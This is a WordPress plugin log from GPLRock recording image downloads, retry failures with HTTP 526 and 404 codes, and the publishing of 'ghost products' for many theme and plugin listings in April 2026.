https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-398c4538.webp [05-Apr-2026 20:31:06 UTC] GPLRock: Ghost product published with image - Product ID: izpay-mobile-app-fintech-startup-elementor-template-kit [05-Apr-2026 20:31:07 UTC] GPLRock: Image downloaded successfully for product interi-creative-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-df3101f5.webp [05-Apr-2026 20:31:07 UTC] GPLRock: Using pre-downloaded image for product interi-creative-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-df3101f5.webp [05-Apr-2026 20:31:07 UTC] GPLRock: Ghost product published with image - Product ID: interi-creative-elementor-template-kit [05-Apr-2026 20:31:09 UTC] GPLRock: Image downloaded successfully for product intera-football-team-sports-club-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0eaec2ed.webp [05-Apr-2026 20:31:09 UTC] GPLRock: Using pre-downloaded image for product intera-football-team-sports-club-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0eaec2ed.webp [05-Apr-2026 20:31:09 UTC] GPLRock: Ghost product published with image - Product ID: intera-football-team-sports-club-elementor-template-kit [05-Apr-2026 20:31:10 UTC] GPLRock: Image downloaded successfully for product integra-it-solution-services-elementor-pro-full-site-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-61e65f6d.webp [05-Apr-2026 20:31:10 UTC] GPLRock: Using pre-downloaded image for product integra-it-solution-services-elementor-pro-full-site-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-61e65f6d.webp [05-Apr-2026 20:31:10 UTC] GPLRock: Ghost product published with image - Product ID: integra-it-solution-services-elementor-pro-full-site-template-kit [05-Apr-2026 20:31:11 UTC] GPLRock: Image downloaded successfully for product insurekit-insurance-template-kits (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1cc675bb.webp [05-Apr-2026 20:31:11 UTC] GPLRock: Using pre-downloaded image for product insurekit-insurance-template-kits: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1cc675bb.webp [05-Apr-2026 20:31:11 UTC] GPLRock: Ghost product published with image - Product ID: insurekit-insurance-template-kits [05-Apr-2026 20:31:13 UTC] GPLRock: Image downloaded successfully for product insure-insurance-business-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c9ec3580.webp [05-Apr-2026 20:31:13 UTC] GPLRock: Using pre-downloaded image for product insure-insurance-business-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c9ec3580.webp [05-Apr-2026 20:31:13 UTC] GPLRock: Ghost product published with image - Product ID: insure-insurance-business-elementor-template-kit [05-Apr-2026 20:31:14 UTC] GPLRock: Image downloaded successfully for product insolan-insurance-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a2185038.webp [05-Apr-2026 20:31:14 UTC] GPLRock: Using pre-downloaded image for product insolan-insurance-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a2185038.webp [05-Apr-2026 20:31:14 UTC] GPLRock: Ghost product published with image - Product ID: insolan-insurance-agency-elementor-template-kit [05-Apr-2026 20:33:07 UTC] GPLRock: Image download failed for product kalles-clean-versatile-responsive-shopify-theme-rtl-support (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 20:33:09 UTC] GPLRock: Image download failed for product kalles-clean-versatile-responsive-shopify-theme-rtl-support (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 20:33:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kalles---clean-versatile-responsive-shopify-theme---rtl-support-27974.webp for product kalles-clean-versatile-responsive-shopify-theme-rtl-support after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 20:33:11 UTC] GPLRock: Image download failed for product kalles-clean-versatile-responsive-shopify-theme-rtl-support (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 20:33:13 UTC] GPLRock: Image download failed for product kalles-clean-versatile-responsive-shopify-theme-rtl-support (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 20:33:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kalles---clean-versatile-responsive-shopify-theme---rtl-support-27974.webp for product kalles-clean-versatile-responsive-shopify-theme-rtl-support after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 20:33:15 UTC] GPLRock WARNING: Image download failed for product kalles-clean-versatile-responsive-shopify-theme-rtl-support. URL: https://meldwp.com/wp-content/uploads/kalles---clean-versatile-responsive-shopify-theme---rtl-support-27974.webp [05-Apr-2026 20:33:15 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: kalles-clean-versatile-responsive-shopify-theme-rtl-support [06-Apr-2026 01:00:58 UTC] GPLRock: Image downloaded successfully for product cryptech-ico-and-cryptocurrency-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-56ff0230.webp [06-Apr-2026 01:00:58 UTC] GPLRock: Using pre-downloaded image for product cryptech-ico-and-cryptocurrency-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-56ff0230.webp [06-Apr-2026 01:00:58 UTC] GPLRock: Ghost product published with image - Product ID: cryptech-ico-and-cryptocurrency-wordpress-theme [06-Apr-2026 01:00:58 UTC] GPLRock: Image download failed for product kristo-modern-magazine-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 01:01:00 UTC] GPLRock: Image download failed for product kristo-modern-magazine-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 01:01:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kristo---modern-magazine-wordpress-theme-21721.webp for product kristo-modern-magazine-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 01:01:03 UTC] GPLRock: Image download failed for product kristo-modern-magazine-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 01:01:05 UTC] GPLRock: Image download failed for product kristo-modern-magazine-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 01:01:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kristo---modern-magazine-wordpress-theme-21721.webp for product kristo-modern-magazine-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 01:01:07 UTC] GPLRock WARNING: Image download failed for product kristo-modern-magazine-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/kristo---modern-magazine-wordpress-theme-21721.webp [06-Apr-2026 01:01:07 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: kristo-modern-magazine-wordpress-theme [06-Apr-2026 01:01:07 UTC] GPLRock: Image download failed for product socialv-social-network-and-community-buddypress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 01:01:09 UTC] GPLRock: Image download failed for product socialv-social-network-and-community-buddypress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 01:01:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/socialv---social-network-and-community-buddypress-theme-23473.webp for product socialv-social-network-and-community-buddypress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 01:01:11 UTC] GPLRock: Image download failed for product socialv-social-network-and-community-buddypress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 01:01:13 UTC] GPLRock: Image download failed for product socialv-social-network-and-community-buddypress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 01:01:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/socialv---social-network-and-community-buddypress-theme-23473.webp for product socialv-social-network-and-community-buddypress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 01:01:15 UTC] GPLRock WARNING: Image download failed for product socialv-social-network-and-community-buddypress-theme. URL: https://meldwp.com/wp-content/uploads/socialv---social-network-and-community-buddypress-theme-23473.webp [06-Apr-2026 01:01:15 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: socialv-social-network-and-community-buddypress-theme [06-Apr-2026 01:01:16 UTC] GPLRock: Image downloaded successfully for product interiocity-home-decor-blog-and-interior-design-magazine-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fe0284b5.webp [06-Apr-2026 01:01:16 UTC] GPLRock: Using pre-downloaded image for product interiocity-home-decor-blog-and-interior-design-magazine-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fe0284b5.webp [06-Apr-2026 01:01:16 UTC] GPLRock: Ghost product published with image - Product ID: interiocity-home-decor-blog-and-interior-design-magazine-wordpress-theme [06-Apr-2026 01:01:16 UTC] GPLRock: Image download failed for product runcrew-running-club-marathon-sports-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 01:01:18 UTC] GPLRock: Image download failed for product runcrew-running-club-marathon-sports-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 01:01:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/runcrew--running-club-marathon--sports-wordpress-theme-14270.webp for product runcrew-running-club-marathon-sports-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 01:01:20 UTC] GPLRock: Image download failed for product runcrew-running-club-marathon-sports-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 01:01:22 UTC] GPLRock: Image download failed for product runcrew-running-club-marathon-sports-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 01:01:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/runcrew--running-club-marathon--sports-wordpress-theme-14270.webp for product runcrew-running-club-marathon-sports-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 01:01:24 UTC] GPLRock WARNING: Image download failed for product runcrew-running-club-marathon-sports-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/runcrew--running-club-marathon--sports-wordpress-theme-14270.webp [06-Apr-2026 01:01:24 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: runcrew-running-club-marathon-sports-wordpress-theme [06-Apr-2026 01:01:24 UTC] GPLRock: Image downloaded successfully for product orson-wordpress-theme-for-online-stores (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2a3443ef.webp [06-Apr-2026 01:01:24 UTC] GPLRock: Using pre-downloaded image for product orson-wordpress-theme-for-online-stores: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2a3443ef.webp [06-Apr-2026 01:01:24 UTC] GPLRock: Ghost product published with image - Product ID: orson-wordpress-theme-for-online-stores [06-Apr-2026 01:01:24 UTC] GPLRock: Image download failed for product icoland-ico-landing-pages-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 01:01:26 UTC] GPLRock: Image download failed for product icoland-ico-landing-pages-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 01:01:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/icoland---ico-landing-pages-wordpress-theme-31685.webp for product icoland-ico-landing-pages-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 01:01:29 UTC] GPLRock: Image download failed for product icoland-ico-landing-pages-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 01:01:31 UTC] GPLRock: Image download failed for product icoland-ico-landing-pages-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 01:01:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/icoland---ico-landing-pages-wordpress-theme-31685.webp for product icoland-ico-landing-pages-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 01:01:33 UTC] GPLRock WARNING: Image download failed for product icoland-ico-landing-pages-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/icoland---ico-landing-pages-wordpress-theme-31685.webp [06-Apr-2026 01:01:33 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: icoland-ico-landing-pages-wordpress-theme [06-Apr-2026 01:01:33 UTC] GPLRock: Image download failed for product mojado-mobile-friendly-hotel-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 01:01:35 UTC] GPLRock: Image download failed for product mojado-mobile-friendly-hotel-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 01:01:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mojado---mobile-friendly-hotel-wordpress-theme-24431.webp for product mojado-mobile-friendly-hotel-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 01:01:37 UTC] GPLRock: Image download failed for product mojado-mobile-friendly-hotel-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 02:16:49 UTC] GPLRock: Image download failed for product salepro-pos-inventory-management-system-hrm-accounting (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 02:16:51 UTC] GPLRock: Image download failed for product salepro-pos-inventory-management-system-hrm-accounting (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 02:16:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/salepro-pos-inventory-management-system-hrm--accounting-1870.webp for product salepro-pos-inventory-management-system-hrm-accounting after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 02:16:53 UTC] GPLRock: Image download failed for product salepro-pos-inventory-management-system-hrm-accounting (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 02:16:55 UTC] GPLRock: Image download failed for product salepro-pos-inventory-management-system-hrm-accounting (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 02:16:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/salepro-pos-inventory-management-system-hrm--accounting-1870.webp for product salepro-pos-inventory-management-system-hrm-accounting after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 02:16:57 UTC] GPLRock WARNING: Image download failed for product salepro-pos-inventory-management-system-hrm-accounting. URL: https://meldwp.com/wp-content/uploads/salepro-pos-inventory-management-system-hrm--accounting-1870.webp [06-Apr-2026 02:16:57 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: salepro-pos-inventory-management-system-hrm-accounting [06-Apr-2026 02:16:57 UTC] GPLRock: Image download failed for product woo-time-to-buy (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 02:16:59 UTC] GPLRock: Image download failed for product woo-time-to-buy (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 02:17:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woo-time-to-buy-10199.webp for product woo-time-to-buy after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 02:27:52 UTC] GPLRock: Image downloaded successfully for product woolentor-pro-woocommerce-page-builder-elementor-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ee73bbd5.jpg [06-Apr-2026 02:27:52 UTC] GPLRock: Using pre-downloaded image for product woolentor-pro-woocommerce-page-builder-elementor-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ee73bbd5.jpg [06-Apr-2026 02:27:52 UTC] GPLRock: Ghost product published with image - Product ID: woolentor-pro-woocommerce-page-builder-elementor-addon [06-Apr-2026 02:27:55 UTC] GPLRock: Image download failed for product motors-automotive-car-dealership-wordpress-theme (attempt 1/3). HTTP Code: 404, Error: . Retrying... [06-Apr-2026 02:27:59 UTC] GPLRock: Image download failed for product motors-automotive-car-dealership-wordpress-theme (attempt 2/3). HTTP Code: 404, Error: . Retrying... [06-Apr-2026 02:28:03 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2020/11/Motors-Automotive-Car-Dealership-Car-Rental-Auto-Classified-Ads-Listing-WordPress-Theme.jpg for product motors-automotive-car-dealership-wordpress-theme after 3 attempts. HTTP Code: 404, Error: [06-Apr-2026 02:28:05 UTC] GPLRock: Image download failed for product motors-automotive-car-dealership-wordpress-theme (attempt 1/3). HTTP Code: 404, Error: . Retrying... [06-Apr-2026 02:28:09 UTC] GPLRock: Image download failed for product motors-automotive-car-dealership-wordpress-theme (attempt 2/3). HTTP Code: 404, Error: . Retrying... [06-Apr-2026 02:28:13 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2020/11/Motors-Automotive-Car-Dealership-Car-Rental-Auto-Classified-Ads-Listing-WordPress-Theme.jpg for product motors-automotive-car-dealership-wordpress-theme after 3 attempts. HTTP Code: 404, Error: [06-Apr-2026 02:28:13 UTC] GPLRock WARNING: Image download failed for product motors-automotive-car-dealership-wordpress-theme. URL: https://www.gplrock.com/wp-content/uploads/2020/11/Motors-Automotive-Car-Dealership-Car-Rental-Auto-Classified-Ads-Listing-WordPress-Theme.jpg [06-Apr-2026 02:28:13 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: motors-automotive-car-dealership-wordpress-theme [06-Apr-2026 02:28:15 UTC] GPLRock: Image downloaded successfully for product onum-seo-marketing-elementor-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-cb81282a.jpg [06-Apr-2026 02:28:15 UTC] GPLRock: Using pre-downloaded image for product onum-seo-marketing-elementor-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-cb81282a.jpg [06-Apr-2026 02:28:15 UTC] GPLRock: Ghost product published with image - Product ID: onum-seo-marketing-elementor-wordpress-theme [06-Apr-2026 02:28:17 UTC] GPLRock: Image downloaded successfully for product hostiko-wordpress-whmcs-hosting-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5e027e4b.jpg [06-Apr-2026 02:28:17 UTC] GPLRock: Using pre-downloaded image for product hostiko-wordpress-whmcs-hosting-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5e027e4b.jpg [06-Apr-2026 02:28:17 UTC] GPLRock: Ghost product published with image - Product ID: hostiko-wordpress-whmcs-hosting-theme [06-Apr-2026 02:28:19 UTC] GPLRock: Image downloaded successfully for product autusin-auto-parts-car-accessories-shop-elementor-woocommerce-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d23de475.png [06-Apr-2026 02:28:19 UTC] GPLRock: Using pre-downloaded image for product autusin-auto-parts-car-accessories-shop-elementor-woocommerce-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d23de475.png [06-Apr-2026 02:28:19 UTC] GPLRock: Ghost product published with image - Product ID: autusin-auto-parts-car-accessories-shop-elementor-woocommerce-wordpress-theme [06-Apr-2026 02:28:21 UTC] GPLRock: Image downloaded successfully for product ohio-creative-portfolio-agency-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9f9c961c.avif [06-Apr-2026 02:28:21 UTC] GPLRock: Using pre-downloaded image for product ohio-creative-portfolio-agency-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9f9c961c.avif [06-Apr-2026 02:28:21 UTC] GPLRock: Ghost product published with image - Product ID: ohio-creative-portfolio-agency-wordpress-theme [06-Apr-2026 02:28:23 UTC] GPLRock: Image downloaded successfully for product smartmag-responsive-retina-wordpress-magazine (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-05cd3a7d.jpg [06-Apr-2026 02:28:23 UTC] GPLRock: Using pre-downloaded image for product smartmag-responsive-retina-wordpress-magazine: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-05cd3a7d.jpg [06-Apr-2026 02:28:23 UTC] GPLRock: Ghost product published with image - Product ID: smartmag-responsive-retina-wordpress-magazine [06-Apr-2026 02:28:24 UTC] GPLRock: Image downloaded successfully for product motta-multi-vendor-and-marketplace-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-864261c0.jpg [06-Apr-2026 02:28:24 UTC] GPLRock: Using pre-downloaded image for product motta-multi-vendor-and-marketplace-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-864261c0.jpg [06-Apr-2026 02:28:24 UTC] GPLRock: Ghost product published with image - Product ID: motta-multi-vendor-and-marketplace-wordpress-theme [06-Apr-2026 02:28:26 UTC] GPLRock: Image downloaded successfully for product essential-addons-for-elementor-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7d728c1f.jpg [06-Apr-2026 02:28:26 UTC] GPLRock: Using pre-downloaded image for product essential-addons-for-elementor-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7d728c1f.jpg [06-Apr-2026 02:28:26 UTC] GPLRock: Ghost product published with image - Product ID: essential-addons-for-elementor-pro [06-Apr-2026 02:28:27 UTC] GPLRock: Image downloaded successfully for product premiumpress-dating-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-84185a4d.webp [06-Apr-2026 02:28:27 UTC] GPLRock: Using pre-downloaded image for product premiumpress-dating-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-84185a4d.webp [06-Apr-2026 02:28:27 UTC] GPLRock: Ghost product published with image - Product ID: premiumpress-dating-theme [06-Apr-2026 02:31:33 UTC] GPLRock: Image downloaded successfully for product envira-gallery-downloads-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e52f8453.jpg [06-Apr-2026 02:31:33 UTC] GPLRock: Using pre-downloaded image for product envira-gallery-downloads-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e52f8453.jpg [06-Apr-2026 02:31:33 UTC] GPLRock: Ghost product published with image - Product ID: envira-gallery-downloads-addon [06-Apr-2026 02:31:35 UTC] GPLRock: Image downloaded successfully for product ultimate-video-player-wordpress-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c6f41d57.jpg [06-Apr-2026 02:31:35 UTC] GPLRock: Using pre-downloaded image for product ultimate-video-player-wordpress-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c6f41d57.jpg [06-Apr-2026 02:31:35 UTC] GPLRock: Ghost product published with image - Product ID: ultimate-video-player-wordpress-plugin [06-Apr-2026 02:31:36 UTC] GPLRock: Image downloaded successfully for product elmastudio-neubau-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-29660b91.jpg [06-Apr-2026 02:31:36 UTC] GPLRock: Using pre-downloaded image for product elmastudio-neubau-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-29660b91.jpg [06-Apr-2026 02:31:36 UTC] GPLRock: Ghost product published with image - Product ID: elmastudio-neubau-wordpress-theme [06-Apr-2026 02:31:38 UTC] GPLRock: Image downloaded successfully for product good-energy-ecology-renewable-power-company-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0b64bc72.jpg [06-Apr-2026 02:31:38 UTC] GPLRock: Using pre-downloaded image for product good-energy-ecology-renewable-power-company-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0b64bc72.jpg [06-Apr-2026 02:31:38 UTC] GPLRock: Ghost product published with image - Product ID: good-energy-ecology-renewable-power-company-wordpress-theme [06-Apr-2026 02:31:40 UTC] GPLRock: Image downloaded successfully for product buddy-simple-wordpress-buddypress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6d9cd582.jpg [06-Apr-2026 02:31:40 UTC] GPLRock: Using pre-downloaded image for product buddy-simple-wordpress-buddypress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6d9cd582.jpg [06-Apr-2026 02:31:40 UTC] GPLRock: Ghost product published with image - Product ID: buddy-simple-wordpress-buddypress-theme [06-Apr-2026 02:31:42 UTC] GPLRock: Image downloaded successfully for product gappointments-appointment-booking-addon-for-gravity-forms (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-62551b49.jpg [06-Apr-2026 02:31:42 UTC] GPLRock: Using pre-downloaded image for product gappointments-appointment-booking-addon-for-gravity-forms: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-62551b49.jpg [06-Apr-2026 02:31:42 UTC] GPLRock: Ghost product published with image - Product ID: gappointments-appointment-booking-addon-for-gravity-forms [06-Apr-2026 02:31:43 UTC] GPLRock: Image downloaded successfully for product give-payumoney (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6260243a.jpg [06-Apr-2026 02:31:43 UTC] GPLRock: Using pre-downloaded image for product give-payumoney: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6260243a.jpg [06-Apr-2026 02:31:43 UTC] GPLRock: Ghost product published with image - Product ID: give-payumoney [06-Apr-2026 02:31:45 UTC] GPLRock: Image downloaded successfully for product wpmu-dev-pay-per-view (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-208441de.jpg [06-Apr-2026 02:31:45 UTC] GPLRock: Using pre-downloaded image for product wpmu-dev-pay-per-view: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-208441de.jpg [06-Apr-2026 02:31:45 UTC] GPLRock: Ghost product published with image - Product ID: wpmu-dev-pay-per-view [06-Apr-2026 02:31:47 UTC] GPLRock: Image downloaded successfully for product listable-a-friendly-directory-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-23a64487.jpg [06-Apr-2026 02:31:47 UTC] GPLRock: Using pre-downloaded image for product listable-a-friendly-directory-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-23a64487.jpg [06-Apr-2026 02:31:47 UTC] GPLRock: Ghost product published with image - Product ID: listable-a-friendly-directory-wordpress-theme [06-Apr-2026 02:31:48 UTC] GPLRock: Image downloaded successfully for product super-bundle-for-wpbakery-page-builder (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8c595ce5.jpg [06-Apr-2026 02:31:48 UTC] GPLRock: Using pre-downloaded image for product super-bundle-for-wpbakery-page-builder: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8c595ce5.jpg [06-Apr-2026 02:31:48 UTC] GPLRock: Ghost product published with image - Product ID: super-bundle-for-wpbakery-page-builder [06-Apr-2026 02:33:40 UTC] GPLRock: Image downloaded successfully for product monni-a-creative-multi-concept-theme-for-agencies-and-freelancers (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a97405a7.webp [06-Apr-2026 02:33:40 UTC] GPLRock: Using pre-downloaded image for product monni-a-creative-multi-concept-theme-for-agencies-and-freelancers: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a97405a7.webp [06-Apr-2026 02:33:40 UTC] GPLRock: Ghost product published with image - Product ID: monni-a-creative-multi-concept-theme-for-agencies-and-freelancers [06-Apr-2026 02:33:40 UTC] GPLRock: Image download failed for product cured-one-page-medical-doctor-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 02:33:42 UTC] GPLRock: Image download failed for product cured-one-page-medical-doctor-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 02:33:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cured---one-page-medical-doctor-wordpress-theme-27834.webp for product cured-one-page-medical-doctor-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 02:33:44 UTC] GPLRock: Image download failed for product cured-one-page-medical-doctor-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 02:33:46 UTC] GPLRock: Image download failed for product cured-one-page-medical-doctor-wordpress-theme (attempt 2/3). 